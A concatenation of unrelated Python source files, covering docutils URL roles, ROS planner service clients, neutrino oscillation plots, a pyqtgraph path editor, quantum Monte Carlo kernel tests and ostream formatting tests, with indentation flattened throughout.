self.eos_idx = smi_field.vocab.stoi[smi_field.eos_token]
self.unk_idx = smi_field.vocab.stoi[smi_field.unk_token]
self.dataset_smi = Dataset(smi_examples, fields=fields)
self.train_smi = Dataset(smi_examples[:-5000], fields=fields)
self.test_smi = Dataset(smi_examples[-5000:], fields=fields)
def dataset_bucket_iter(self, batch_size=None):
bsize = self.batch_size if batch_size is None else batch_size
return BucketIterator(self.dataset_smi, batch_size=bsize, train=False, shuffle=False,
sort=False, sort_within_batch=False, repeat=False)
def train_bucket_iter(self, batch_size=None):
bsize = self.batch_size if batch_size is None else batch_size
return BucketIterator(self.train_smi, batch_size=bsize, train=True,
sort_within_batch=True, repeat=False, sort_key=lambda x: len(x.smile))
def test_bucket_iter(self, batch_size=None):
bsize = self.batch_size if batch_size is None else batch_size
return BucketIterator(self.test_smi, batch_size=bsize, train=False,
sort_within_batch=True, repeat=False, sort_key=lambda x: len(x.smile))
def get_vocab(self):
return self.vocab |
<reponame>tony/django-docutils
from docutils import nodes, utils
from ..utils import split_explicit_title
def generic_url_role(name, text, url_handler_fn, innernodeclass=nodes.Text):
"""This cleans up a lot of code we had to repeat over and over.
This generic role also handles explicit titles (:role:`yata yata <target>`)
This breaks convention a feels a bit jenky at first. It uses a callback
because figuring out the url is the only magic that happens, but its
sandwiched in the middle.
:param name: name of the role, e.g. 'github'
:type name: string
:param text: text inside of the role, e.g:
- 'airline-mode/airline-mode'
- 'this repo <airline-mode/airline-mode>'
:type text: string
:param url_handler_fn: a function that accepts the target param, example:
:returntype url_handler_fn: string
:returns: tuple ([node], [])
:returntype: tuple
Simple example, let's create a role::
.. code-block:: python
def github_role(
name, rawtext, text, lineno, inliner, options={}, content=[]
):
def url_handler(target):
return 'https://github.com/{}'.format(target)
return generic_url_role(name, text, url_handler)
roles.register_local_role('gh', github_role)
"""
name = name.lower()
has_explicit_title, title, target = split_explicit_title(text)
title = utils.unescape(title)
target = utils.unescape(target)
if not has_explicit_title:
title = utils.unescape(title)
else:
if '**' == title[:2] and '**' == title[-2:]:
innernodeclass = nodes.strong
title = title.strip('**')
elif '*' == title[0] and '*' == title[-1]:
innernodeclass = nodes.emphasis
title = title.strip('*')
url = url_handler_fn(target)
sn = innernodeclass(title, title)
rn = nodes.reference('', '', internal=True, refuri=url, classes=[name])
rn += sn
return [rn], []
def generic_remote_url_role(name, text, url_handler_fn, innernodeclass=nodes.Text):
"""This is a generic_url_role that can return a url AND a title remotely
The url_handler_fn returns a title and a url
In cases like Amazon API, database lookups, and other stuff, information
may be looked up by key, and we may get a fresh title to fill in if nothing
else explicit is mentioned.
:param name: name of the role, e.g. 'github'
:type name: string
:param text: text inside of the role, e.g:
- 'airline-mode/airline-mode'
- 'this repo <airline-mode/airline-mode>'
:type text: string
:param url_handler_fn: a function that accepts the target param, example:
:returntype url_handler_fn: (string, string)
:returns: tuple ([node], [])
:returntype: tuple
Simple example, let's create a role::
.. code-block:: python
def amzn_role(
name, rawtext, text, lineno, inliner, options={}, content=[]
):
def url_handler(target):
query = amzn.lookup(ItemId=target)
return query.title, query.offer_url
return generic_remote_url_role(name, text, url_handler)
roles.register_local_role('amzn', amzn_role)
"""
name = name.lower()
has_explicit_title, title, target = split_explicit_title(text)
title = utils.unescape(title)
target = utils.unescape(target)
remote_title, url = url_handler_fn(target)
if not has_explicit_title:
title = utils.unescape(remote_title)
sn = innernodeclass(title, title)
rn = nodes.reference('', '', internal=True, refuri=url, classes=[name])
rn += sn
return [rn], []
|
<reponame>JKBehrens/STAAMS-Solver
#!/usr/bin/env python
"""
Copyright (c) 2018 Robert Bosch GmbH
All rights reserved.
This source code is licensed under the BSD-3-Clause license found in the
LICENSE file in the root directory of this source tree.
@author: <NAME>
"""
import rospy
from roadmap_planning_common_msgs.srv import AddOVC, AddOVCResponse, AddOVCRequest, AddOvcCt, AddOvcCtResponse, \
AddOvcCtRequest, SetState, SetStateResponse, SetStateRequest, GetIntListForStringList, \
GetIntListForStringListResponse, GetIntListForStringListRequest, AddObject, AddObjectResponse, AddObjectRequest, \
StringQueryRequest, StringQuery
from std_srvs.srv import Empty, EmptyResponse, EmptyRequest
from roadmap_planning_common_msgs.msg import ovc, Range, Domain, OrderedVisitingConstraint, ConstraintType
class PlannerServiceProxies:
@staticmethod
def add_ovc(groups=["r1_arm", "r2_arm"], domains=[[1], [5]], location_names=None, ranges=[[30, 500], [30, 500]]):
'''
Function that reates an addOvcRequest and sends it to the prm_planner_wrapper
:param groups: list of groups, that should be considered for executing the OVC
:param domains: list of int-lists with location indexes (you can use the SceneObjectSearchMapping to retrieve them)
:param ranges: list (len == len(domains) of int-lists (len == 2)
:return: the name of the created OVC (in a list)
'''
rospy.wait_for_service("/prm_planner_wrapper/add_ovc")
srv_add_ovc = rospy.ServiceProxy("/prm_planner_wrapper/add_ovc", AddOVC)
ovc_req = AddOVCRequest()
o = OrderedVisitingConstraint()
o.groups = groups
if location_names is not None:
pass
#TODO: implement!!!
assert len(domains) == len(ranges)
for d in domains:
dom = Domain()
dom.values = d
o.location_domains.append(dom)
for ra in ranges:
if isinstance(ra, Range):
o.duration_ranges.append(ra)
elif isinstance(ra, list):
assert len(ra) == 2
ran = Range() # type: range
ran.min = ra[0]
ran.max = ra[1]
o.duration_ranges.append(ran)
ovc_req.ovcs.append(o)
res = srv_add_ovc.call(ovc_req) # type: AddOVCResponse
print(res.names)
return res.names
@staticmethod
def get_locs_for_names(names=[]):
'''
This Function queries the location aliases for a list of names in Roadmap
:param names: list of object name strings
:return: list of ints - the location aliases
'''
service_name = "/prm_planner_wrapper/get_locs_for_names"
srv_get_locs_for_names = rospy.ServiceProxy(service_name, GetIntListForStringList)
req = GetIntListForStringListRequest()
req.str_in = names
res = srv_get_locs_for_names.call(req) # type: GetIntListForStringListResponse
return [loc for loc in res.int_out]
@staticmethod
def add_object_online_client(pose, name, obj_type):
service_name = "/prm_planner_wrapper/add_object_online"
srv_add_obj_online = rospy.ServiceProxy(service_name, AddObject)
req = AddObjectRequest()
req.pose = pose
req.object_name = name
req.object_type = obj_type
res = srv_add_obj_online.call(req) # type: AddObjectResponse
return res.success
@staticmethod
def solve_client():
service_name = "/prm_planner_wrapper/solve"
rospy.wait_for_service(service_name)
srv_client = rospy.ServiceProxy(service_name, Empty)
req = EmptyRequest()
res = srv_client.call(req) # type: EmptyResponse
return
@staticmethod
def reset_planner_client():
service_name = "/prm_planner_wrapper/reset_planner"
rospy.wait_for_service(service_name)
srv_client = rospy.ServiceProxy(service_name, Empty)
req = EmptyRequest()
res = srv_client.call(req) # type: EmptyResponse
return
@staticmethod
def add_ovc_ct(ovc=[], interval=[], params=None, ct_type=ConstraintType.StartsAfterEnd):
add_ovc_ct_client = rospy.ServiceProxy("/prm_planner_wrapper/add_ovc_ct", AddOvcCt)
req = AddOvcCtRequest()
req.ct.ovc_name = [o.name for o in ovc]
req.ct.ct_type.val = ct_type
req.ct.ovc_interval = interval
if params is None:
req.ct.params = []
else:
req.ct.params = params
res = add_ovc_ct_client.call(req) # type: AddOvcCtResponse
return res
@staticmethod
def add_state_ct(group_name,state_index, values, use_location=True):
# type: (str, int, list[int], bool) -> bool
'''
Restrict the value of a configuration variable identified by the group_name and the state_index to be in values.
if use_location is True, the configuration must be in the configurations reaching to any of the locations in
values
:param group_name: name of the active component
:param state_index: index to select the configuration variables. negative values are possible (e.g. -1 denotes
the last configuration
:param values: list of integers.
:param use_location: determines if values are interpreted as locations or configurations
:return: returns False, if the problem gets infeasible
'''
srv_set_state = rospy.ServiceProxy("/prm_planner_wrapper/set_state", SetState)
set_state_req = SetStateRequest()
set_state_req.group = group_name
set_state_req.state_index = state_index
set_state_req.values.values = values
set_state_req.use_location = use_location
res = srv_set_state.call(set_state_req)
return res.success
# TODO: factor out to motion dispatcher service clients
@staticmethod
def move_arm_to_node_client(input=[]):
service_name = 'MOTION_DISPATCHER/MOVE_TO_NODE'
rospy.wait_for_service(service_name)
try:
get_obj_srv = rospy.ServiceProxy(service_name, StringQuery)
req = StringQueryRequest() # type: StringQueryRequest
req.input = input
resp1 = get_obj_srv(req) # type: StringQueryResponse
return resp1.output, resp1.success
except rospy.ServiceException, e:
print "Service call failed: %s" % e
# srv_add_ovc_ct = rospy.ServiceProxy("/prm_planner_wrapper/add_ovc_ct", AddOvcCt)
# srv_set_state = rospy.ServiceProxy("/prm_planner_wrapper/set_state", SetState)
# srv_add_obj_online = rospy.ServiceProxy("/prm_planner_wrapper/add_object_online", AddObject)
|
import numpy as np # type: ignore
import nptyping as npt # type: ignore
from typing import Any, Optional, Tuple
import matplotlib.pyplot as plt # type: ignore
from astropy.constants import codata2018 as ac # type: ignore
import astropy.units as u # type: ignore
from astropy.visualization import quantity_support # type: ignore
neutrino_names = ['e', 'mu', 'tau']
m_min = 0 * u.eV
def osc_probability(
E_over_L: npt.NDArray[float],
initial_flavour: int = 0,
final_flavour: int = 1,
ordering: str = 'normal',
):
"""
Probability of oscillation
Args:
E_over_L (float): in eV**2
initial_flavour (int): number between 0=e, 1=mu, 2=tau
final_flavour (int): number between 0=e, 1=mu, 2=tau
ordering (str): either normal or inverted
"""
masses, mixing_matrix = prepare_oscillation_parameters(ordering)
return abs(np.sum(
np.conj(mixing_matrix[initial_flavour, :, np.newaxis]) *
mixing_matrix[final_flavour, :, np.newaxis] *
np.exp(- 1j * masses[:, np.newaxis]**2
/ E_over_L[np.newaxis, :]
/ 2),
axis=0
))**2
def matrix(theta_12: float, theta_13: float, theta_23: float, delta_CP: float):
c12 = np.cos(theta_12)
c13 = np.cos(theta_13)
c23 = np.cos(theta_23)
s12 = np.sin(theta_12)
s13 = np.sin(theta_13)
s23 = np.sin(theta_23)
return np.array([
[
c12*c13,
s12*c13,
s13*np.exp(-1j*delta_CP)
],
[
-s12*c23-c12*s23*s13*np.exp(1j*delta_CP),
c12*c23 - s12*s13*s23*np.exp(1j * delta_CP),
s23*c13
],
[
s12*s23 - c12*c23*s13*np.exp(1j*delta_CP),
-c12*s23 - s12*c23*s13*np.exp(1j * delta_CP),
c23*c13
]
])
@u.quantity_input
def osc_plot(
E_over_L,
# E_over_L: u.Quantity[u.MeV / u.km],
op: np.ndarray,
initial: int,
final: int
):
with quantity_support():
plt.semilogx(
E_over_L, op, label=f'Transition from {neutrino_names[initial]} to {neutrino_names[final]}')
@u.quantity_input
def flux_plot(
L_over_E,
# L_over_E: u.Quantity[u.km / u.MeV],
op: np.ndarray,
flux: np.ndarray,
**kwargs):
with quantity_support():
plt.plot(L_over_E, op * flux, **kwargs)
plt.plot(L_over_E, flux, ls=':')
def flux(E: np.ndarray):
""" Parametrization from https://arxiv.org/abs/0807.3203,
where the energy is in MeV (?)
"""
# E /= 1.2
# energy and momentum of the emitted positron
Ep = E - 1.29333236 # Energy minus neutron-proton mass difference
pp = np.sqrt(Ep**2 - 0.51099895**2) # proton energy minus positron mass
return (
.58 * np.exp(.87 - .16*E - .091*E**2) +
.30 * np.exp(.896 - .239*E - .0981*E**2) +
.07 * np.exp(.976 - .162*E - .079*E**2) +
.05 * np.exp(.793 - .08*E - .1085*E**2)
) * Ep * pp * E**2
def prepare_oscillation_parameters(ordering: str = 'normal') -> Tuple[npt.NDArray[(3, ), float], npt.NDArray[(3, 3), np.complex128]]:
# based on the values given in http://arxiv.org/abs/1507.05613
if ordering == 'normal':
theta_12 = np.arcsin(np.sqrt(.308))
theta_13 = np.arcsin(np.sqrt(.1)) / 2
# theta_13 = np.arcsin(np.sqrt(.0234))
theta_23 = np.arcsin(np.sqrt(.437))
delta_m21_square = 7.54e-5 * u.eV**2
delta_m31_square = 2.47e-3 * u.eV**2
delta_CP = 1.39 * np.pi
m1 = m_min
m2 = np.sqrt(delta_m21_square + m1**2)
m3 = np.sqrt(delta_m31_square + m1**2)
elif ordering == 'inverted':
theta_12 = np.arcsin(np.sqrt(.308))
theta_13 = np.arcsin(np.sqrt(.0240))
theta_23 = np.arcsin(np.sqrt(.455))
delta_m21_square = 7.54e-5 * u.eV**2
delta_m31_square = -2.42e-3 * u.eV**2
delta_CP = 1.31 * np.pi
m3 = m_min
m1 = np.sqrt(m3**2 - delta_m31_square)
m2 = np.sqrt(delta_m21_square + m1**2)
else:
raise NotImplementedError(f'Ordering {ordering} not found')
U = matrix(theta_12, theta_13, theta_23, delta_CP)
masses = np.array([m1.value, m2.value, m3.value])
return masses, U
def oscillations():
# parameters for Juno
E_range = np.logspace(0, 4, num=2000) * u.MeV
L = 60 * u.km
E_over_L_range = (E_range / L * ac.c * ac.hbar).to(u.eV**2).value
initial = 0
rescaled_E_over_L = (E_over_L_range * u.eV**2 /
ac.hbar / ac.c).to(u.MeV / u.km)
for final in range(3):
op = osc_probability(E_over_L_range, initial, final)
osc_plot(rescaled_E_over_L, op, initial, final)
plt.legend()
def juno_flux():
E = 1 * u.MeV
L_range = np.linspace(5, 32, num=1000) * u.km
E_over_L_range = (E / L_range * ac.c * ac.hbar).to(u.eV**2).value
op_normal = osc_probability(E_over_L_range, 0, 0, ordering='normal')
op_inverted = osc_probability(E_over_L_range, 0, 0, ordering='inverted')
rescaled_E_over_L = (E_over_L_range * u.eV**2 /
ac.hbar / ac.c).to(u.MeV / u.km)
f = flux((rescaled_E_over_L * 60 * u.km).to(u.MeV).value)
# op = np.convolve(op, np.ones(25)/25, mode='same')
flux_plot(1/rescaled_E_over_L, op_normal, f, label='normal')
flux_plot(1/rescaled_E_over_L, op_inverted, f, label='inverted')
plt.ylabel('Flux [arbitrary units]')
plt.legend()
if __name__ == "__main__":
from make_all_figures import plot_and_save
plot_and_save(oscillations)
plot_and_save(juno_flux)
|
<gh_stars>0
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
class FlowlinePath(pg.PlotDataItem):
def __init__(self):
# Index of point being dragged
self.drag_index = None
# How far to translate dragged point from original position
self.drag_offset = None
# Brush for highlighted point
self.selected_brush = pg.mkBrush('r')
# Brush for default points
self.default_brush = pg.mkBrush('k')
# Number of points
self.num_points = 0
# Index of selected point
self.selected_indexes = set([])
# Extend mode?
self.extend_mode = False
# Moving point
self.moving_point_index = None
# Control button pressed
self.ctrl_pressed = False
pg.PlotDataItem.__init__(self)
### Event handling
# Triggered when a point is clicked
self.scatter.sigClicked.connect(self.pointClicked)
### Sets the initial data
def setData(self, **kwds):
self.data = kwds
# Check to make sure we have all required fields
if 'x' in kwds and 'y' in kwds:
# Set positions
self.setPositionData(self.data.pop('x'), self.data.pop('y'))
# Set data for each point
self.setPointData()
# Refresh list of symbol brushes
self.setSymbolBrushes()
# Update graph
self.updateGraph()
### Set position data
def setPositionData(self, xs, ys):
self.num_points = len(xs)
self.data['x'] = xs
self.data['y'] = ys
### Gets the position of a point with the given index
def getPosition(self, index):
return np.array([self.data['x'][index], self.data['y'][index]])
### Sets coordinates of point with given index
def setPointCoords(self, index, coords):
self.data['x'][index] = coords[0]
self.data['y'][index] = coords[1]
### Get coordinates of point with given index
def getPointCoords(self, index):
return np.array([self.data['x'][index], self.data['y'][index]])
### Set additional data associated with each point
def setPointData(self):
self.data['data'] = np.empty(self.num_points, dtype=[('index', int)])
self.data['data']['index'] = np.arange(self.num_points)
### Sets symbol brushes after points have been inserted or removed
def setSymbolBrushes(self):
brushes = np.empty(self.num_points, dtype=object)
brushes[:] = self.default_brush
self.data['symbolBrush'] = brushes
### Insert a point at given index
def insertPoint(self, index, coords):
self.num_points += 1
# Insert position data
self.data['x'] = np.insert(self.data['x'], index, coords[0])
self.data['y'] = np.insert(self.data['y'], index, coords[1])
# Update point data
self.data['data'] = np.append(self.data['data'], np.array((self.num_points - 1,), self.data['data'].dtype))
# Update symbol brushes
self.data['symbolBrush'] = np.append(self.data['symbolBrush'], self.default_brush)
### Adds a point at beginning of path
def addPointStart(self, coords):
self.insertPoint(0, coords)
### Adds a point at end of path
def addPointEnd(self, coords):
self.insertPoint(self.num_points, coords)
### Remove points with given indexes
def removePoints(self, indexes):
self.num_points -= len(indexes)
# Update point data
self.data['x'] = np.delete(self.data['x'], indexes)
self.data['y'] = np.delete(self.data['y'], indexes)
# Reset point data, brushes, selected indexes
self.setPointData()
self.setSymbolBrushes()
self.selected_indexes.clear()
### Indicates a point is selected by usnig a different brush
def addSelectedPoint(self, index):
self.selected_indexes.add(index)
self.data['symbolBrush'][index] = self.selected_brush
### Deselect all currently selected point
def deselectAll(self):
for index in self.selected_indexes:
self.data['symbolBrush'][index] = self.default_brush
self.selected_indexes.clear()
### Respond to a mouse drag
def mouseDragEvent(self, ev):
self.selectFlowline(self)
if ev.button() != QtCore.Qt.LeftButton:
ev.ignore()
return
if ev.isStart():
# We are already one step into the drag. Find the point(s) at the mouse
# cursor when the button was first pressed:
pos = ev.buttonDownPos()
pts = self.scatter.pointsAt(pos)
if len(pts) == 0:
ev.ignore()
return
# Get the index of the dragged point
self.drag_index = pts[0].data()[0]
# Offset from the original position
self.drag_offset = self.getPointCoords(self.drag_index) - pos
# Select only this point
self.deselectAll()
self.addSelectedPoint(self.drag_index)
elif ev.isFinish():
self.drag_index = None
return
else:
if self.drag_index is None:
ev.ignore()
return
# In the midst of a drag
self.setPointCoords(self.drag_index, ev.pos() + self.drag_offset)
self.updateGraph()
ev.accept()
### Dumb setter function for extend mode so I can keep track of when
### extend mode is toggled
def setExtendMode(self, mode):
print "extend mode", mode
self.extend_mode = mode
### Respond to a click that's not on a point
def offPointClick(self):
if self.extend_mode:
self.extend()
else :
self.deselectAll()
self.updateGraph()
### Respond to mouse movement
def mouseMove(self, pos):
# Get mouse coordinates
coords = np.array([pos.x(), pos.y()])
# Check if we're in extend mode
if self.extend_mode:
# Move the first or last point + associated boundary points to mouse coordinates
self.setPointCoords(self.moving_point_index, coords)
self.updateGraph()
### Extend the current path
def extend(self):
self.deselectAll()
pos = self.getPointCoords(self.moving_point_index)
if self.moving_point_index == 0:
self.addPointStart(pos)
else :
self.addPointEnd(pos)
self.moving_point_index += 1
### Event called when a point is clicked
def pointClicked(self, p, pts):
self.selectFlowline(self)
if self.extend_mode:
# If we're in extend mode, keep extending the path
self.extend()
else :
# Otherwise selec a point
if not self.ctrl_pressed:
self.deselectAll()
self.addSelectedPoint(pts[0].data()[0])
self.updateGraph()
### Respond to delete key press
def deleteKeyPressed(self):
# If there is a selected point, and we're not in extend mode, delete it
if (not self.extend_mode) and (not len(self.selected_indexes) == 0):
self.removePoints(np.array(list(self.selected_indexes)))
self.updateGraph()
### Triggers when e key is pressed for extend mode
def extendKeyPressed(self):
# Check if there's one selected point and it's either the first or last
# One point is selected
one_selected = len(self.selected_indexes) == 1
# First center point is selected
first_selected = 0 in self.selected_indexes
# Last center point is selected
last_selected = self.num_points - 1 in self.selected_indexes
# Combined conditional
cond = one_selected and (last_selected or first_selected)
if (not self.extend_mode) and cond:
# Enable extend mode
self.setExtendMode(True)
self.deselectAll()
# If selected point is at beginning of path, add points starting from
# there. If selected point is at end, add points from there.
if first_selected:
pos = self.getPointCoords(0)
# Add a point + children
self.addPointStart(pos)
# Set moving index to the index of the newly added center point
self.moving_point_index = 0
else :
pos = self.getPointCoords(self.num_points - 1)
self.addPointEnd(pos)
self.moving_point_index = self.num_points - 1
else :
# Disable extend mode
self.setExtendMode(False)
self.deselectAll()
self.updateGraph()
### Triggered when the subdivide key is pressed
def subdivideKeyPressed(self):
# If we're not in extend mode, check if there are two points selected
if not self.extend_mode and len(self.selected_indexes) == 2:
indexes = list(self.selected_indexes)
# Check if two adjacent points are selected
if abs(indexes[0] - indexes[1]) == 1:
# Insert a new center point between the two selected center points
pos1 = self.getPointCoords(indexes[0])
pos2 = self.getPointCoords(indexes[1])
new_pos = (pos1 + pos2) / 2.
self.deselectAll()
self.insertPoint(min(indexes) + 1, new_pos)
self.updateGraph()
### Update the graph data so the graph is redrawn
def updateGraph(self):
pg.PlotDataItem.setData(self, **self.data)
### Several Necessary inherited function
def shape(self):
# Inherit shape from the curve item
return self.scatter.shape()
def boundingRect(self):
# All graphics items require this method (unless they have no contents)
return self.shape().boundingRect()
def paint(self, p, *args):
# All graphics items require this method (unless they have no contents)
return
|
<gh_stars>10-100
import unittest
import torch
from pyscf import gto
from torch import nn
from torch.autograd import Variable, grad
import numpy as np
from qmctorch.scf import Molecule
from qmctorch.wavefunction.orbitals.backflow.kernels import BackFlowKernelBase
from qmctorch.wavefunction.jastrows.distance.electron_electron_distance import ElectronElectronDistance
torch.set_default_tensor_type(torch.DoubleTensor)
torch.manual_seed(101)
np.random.seed(101)
def hess(out, pos):
# compute the jacobian
z = Variable(torch.ones(out.shape))
jacob = grad(out, pos,
grad_outputs=z,
only_inputs=True,
create_graph=True)[0]
# compute the diagonal element of the Hessian
z = Variable(torch.ones(jacob.shape[0]))
hess = torch.zeros(jacob.shape)
for idim in range(jacob.shape[1]):
tmp = grad(jacob[:, idim], pos,
grad_outputs=z,
only_inputs=True,
create_graph=True)[0]
hess[:, idim] = tmp[:, idim]
return hess
def hess_single_element(out, inp):
shape = out.shape
out = out.reshape(-1, 1)
# compute the jacobian
z = Variable(torch.ones(out.shape))
jacob = grad(out, inp,
grad_outputs=z,
only_inputs=True,
create_graph=True)[0]
# compute the diagonal element of the Hessian
z = Variable(torch.ones(jacob.shape))
hess = grad(jacob, inp,
grad_outputs=z,
only_inputs=True,
create_graph=True)[0]
return hess.reshape(*shape)
class GenericBackFlowKernel(BackFlowKernelBase):
def __init__(self, mol, cuda=False):
"""Define a generic kernel to test the auto diff features."""
super().__init__(mol, cuda)
eps = 1E-4
self.weight = nn.Parameter(
eps * torch.rand(self.nelec, self.nelec)).to(self.device)
def _backflow_kernel(self, ree):
"""Computes the backflow kernel:
.. math:
\\eta(r_{ij}) = w_{ij} r_{ij}^2
Args:
r (torch.tensor): e-e distance Nbatch x Nelec x Nelec
Returns:
torch.tensor : f(r) Nbatch x Nelec x Nelec
"""
return self.weight * ree * ree
class TestGenericBackFlowKernel(unittest.TestCase):
def setUp(self):
# define the molecule
at = 'C 0 0 0'
basis = 'dzp'
self.mol = Molecule(atom=at,
calculator='pyscf',
basis=basis,
unit='bohr')
# define the kernel
self.kernel = GenericBackFlowKernel(self.mol)
self.edist = ElectronElectronDistance(self.mol.nelec)
# define the grid points
self.npts = 11
self.pos = torch.rand(self.npts, self.mol.nelec * 3)
self.pos = Variable(self.pos)
self.pos.requires_grad = True
def test_derivative_backflow_kernel(self):
"""Test the derivative of the kernel function
wrt the elec-elec distance."""
ree = self.edist(self.pos)
bf_kernel = self.kernel(ree)
dbf_kernel_auto = grad(
bf_kernel, ree, grad_outputs=torch.ones_like(bf_kernel))[0]
dbf_kernel = self.kernel(ree, derivative=1)
assert(torch.allclose(dbf_kernel.sum(), dbf_kernel_auto.sum()))
assert(torch.allclose(dbf_kernel, dbf_kernel_auto))
def test_second_derivative_backflow_kernel(self):
"""Test the 2nd derivative of the kernel function
wrt the elec-elec distance."""
ree = self.edist(self.pos)
bf_kernel = self.kernel(ree)
d2bf_kernel_auto = hess_single_element(bf_kernel, ree)
d2bf_kernel = self.kernel(ree, derivative=2)
assert(torch.allclose(d2bf_kernel.sum(), d2bf_kernel_auto.sum()))
assert(torch.allclose(d2bf_kernel, d2bf_kernel_auto))
def test_derivative_backflow_kernel_pos(self):
"""Test the derivative of the kenel function wrt the pos of the elecs.
Note that the derivative edist(pos,1) returns d r_ij = d/dx_i r_ij
and that d/dx_j r_ij = d/d_xi r_ij = - d/dx_i r_ji
i.e. edist(pos,1) returns half of the derivatives
so to obatin the same values than autograd we need to double d/dx_i r_ij
"""
# compute the ee dist
ree = self.edist(self.pos)
# compute the kernel values
bfpos = self.kernel(ree)
# computes the derivative of the ee dist
di_ree = self.edist(self.pos, 1)
dj_ree = di_ree
# compute the derivative of the kernal values
bf_der = self.kernel(
ree, derivative=1)
# get the der of the bf wrt the first elec in ree
di_bfpos = bf_der.unsqueeze(1) * di_ree
# need to take the transpose here
# get the der of the bf wrt the second elec in ree
dj_bfpos = (bf_der.permute(0, 2, 1)).unsqueeze(1) * dj_ree
# add both components
d_bfpos = di_bfpos + dj_bfpos
# computes the the derivative of the kernal values with autograd
dbfpos_grad = grad(
bfpos, self.pos, grad_outputs=torch.ones_like(bfpos))[0]
# checksum
assert(torch.allclose(d_bfpos.sum(), dbfpos_grad.sum()))
# reshape and check individual elements
dbfpos = d_bfpos.sum(-1).permute(0, 2,
1).reshape(self.npts, -1)
assert(torch.allclose(dbfpos, dbfpos_grad))
def test_second_derivative_backflow_kernel_pos(self):
"""Test the derivative of the kenel function wrt the pos of the elecs.
Note that the derivative edist(pos,1) returns d r_ij = d/dx_i r_ij
and that d/dx_j r_ij = d/d_xi r_ij = - d/dx_i r_ji
i.e. edist(pos,1) returns half of the derivatives
Same thing for edist(pos,2)
so to obatin the same values than autograd we need to double d/dx_i r_ij
"""
# compute the ee dist
ree = self.edist(self.pos)
# compute the kernel values
bf_kernel = self.kernel(ree)
# computes the derivative of the ee dist
di_ree = self.edist(self.pos, 1)
dj_ree = di_ree
# computes the derivative of the ee dist
d2i_ree = self.edist(self.pos, 2)
d2j_ree = d2i_ree
# compute the derivative of the kernel values
d2bf_kernel = self.kernel(
ree, derivative=2).unsqueeze(1) * di_ree * di_ree
d2bf_kernel += self.kernel(
ree, derivative=2).permute(0, 2, 1).unsqueeze(1) * dj_ree * dj_ree
d2bf_kernel += self.kernel(
ree, derivative=1).unsqueeze(1) * d2i_ree
d2bf_kernel += self.kernel(
ree, derivative=1).permute(0, 2, 1).unsqueeze(1) * d2j_ree
# computes the the derivative of the kernal values with autograd
d2bf_kernel_auto = hess(bf_kernel, self.pos)
# checksum
assert(torch.allclose(d2bf_kernel.sum(), d2bf_kernel_auto.sum()))
# reshape and check individual elements
d2bf_kernel = d2bf_kernel.sum(-1).permute(0, 2,
1).reshape(self.npts, -1)
assert(torch.allclose(d2bf_kernel, d2bf_kernel_auto))
if __name__ == "__main__":
unittest.main()
|
<filename>tests.py<gh_stars>0
import unittest
from io import StringIO
from ostream import OStream, endl, ends
from ostream.precisions import DefaultPrecision, FixedPrecision
from iomanip import setprecision, setfill, setw
class TestOStream(unittest.TestCase):
def setUp(self):
self.output_stream = StringIO()
self.cout = OStream(output_stream=self.output_stream)
def tearDown(self):
self.cout = None
self.output_stream.close()
def _get_stream_value(self):
return self.output_stream.getvalue()
def test_basic(self):
# pylint: disable=pointless-statement,expression-not-assigned
self.cout << "<NAME>" << " " << "cruel!" << endl << ends
self.assertEqual("Olá mundo cruel!\n\0", self._get_stream_value())
def _test_numbers(self):
# pylint: disable=pointless-statement,expression-not-assigned
self.cout << 10 << "," << 2.0/5.0 << endl
self.assertEqual("10,0.4\n", self._get_stream_value())
def test_setprecicion(self):
# pylint: disable=pointless-statement,expression-not-assigned
self.cout << setprecision(3) << 2.0/3.0
self.assertEqual("0.67", self._get_stream_value())
def test_set_fill_width(self):
# pylint: disable=pointless-statement,expression-not-assigned
self.cout << "ABCD" << "\n" \
<< setfill("-") << setw(4) \
<< "EF" << "\n" \
<< "IJKL" << "\n" \
<< setfill("-") << setw(4) \
<< "MNOPQRS\n" \
<< setfill("-") << setw(4) \
<< "TU\nVWXYZ"
string = "ABCD\n" \
"--EF\n" \
"IJKL\n" \
"MNOPQRS\n" \
"TU\nVWXYZ"
self.assertEqual(string, self._get_stream_value())
def test_complex_stream(self):
# pylint: disable=pointless-statement,expression-not-assigned
self.cout << "Olá mundo" \
<< " cruel! " \
<< 100.123 \
<< setprecision(2) << "\n" \
<< "depois do precision\n" \
<< 100.1234 \
<< " depois do número" \
<< endl \
<< "Hello World\n" \
<< setfill('*') \
<< setw(5) \
<< "a\nb" \
<< endl
string = "Olá mundo cruel! 100.123\n" \
"depois do precision\n" \
"1e+02" \
" depois do número\n" \
"Hello World\n" \
"**a\n" \
"b\n"
self.assertEqual(string, self._get_stream_value())
class TestScentificPrecision(unittest.TestCase):
def test_123_456(self):
value = 123.456
self.assertEqual("123.456", DefaultPrecision(6).handle(value))
self.assertEqual("123.46", DefaultPrecision(5).handle(value))
self.assertEqual("123.5", DefaultPrecision(4).handle(value))
self.assertEqual("123", DefaultPrecision(3).handle(value))
self.assertEqual("1.2e+02", DefaultPrecision(2).handle(value))
self.assertEqual("1e+02", DefaultPrecision(1).handle(value))
def test_approximation(self):
value = 199.999
self.assertEqual("199.999", DefaultPrecision(6).handle(value))
self.assertEqual("200", DefaultPrecision(5).handle(value))
self.assertEqual("200", DefaultPrecision(4).handle(value))
self.assertEqual("200", DefaultPrecision(3).handle(value))
self.assertEqual("2e+02", DefaultPrecision(2).handle(value))
self.assertEqual("2e+02", DefaultPrecision(1).handle(value))
class TestFixedPrecision(unittest.TestCase):
def test_123_456(self):
value = 123.456
self.assertEqual("123.456000", FixedPrecision(6).handle(value))
self.assertEqual("123.45600", FixedPrecision(5).handle(value))
self.assertEqual("123.4560", FixedPrecision(4).handle(value))
self.assertEqual("123.456", FixedPrecision(3).handle(value))
self.assertEqual("123.46", FixedPrecision(2).handle(value))
self.assertEqual("123.5", FixedPrecision(1).handle(value))
self.assertEqual("123", FixedPrecision(0).handle(value))
def test_approximation(self):
value = 199.999
self.assertEqual("199.999000", FixedPrecision(6).handle(value))
self.assertEqual("199.99900", FixedPrecision(5).handle(value))
self.assertEqual("199.9990", FixedPrecision(4).handle(value))
self.assertEqual("199.999", FixedPrecision(3).handle(value))
self.assertEqual("200.00", FixedPrecision(2).handle(value))
self.assertEqual("200.0", FixedPrecision(1).handle(value))
self.assertEqual("200", FixedPrecision(0).handle(value))
if __name__ == '__main__':
unittest.main()
|
<filename>uiclasses/collections.py
# Copyright (c) 2020 NewStore GmbH
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
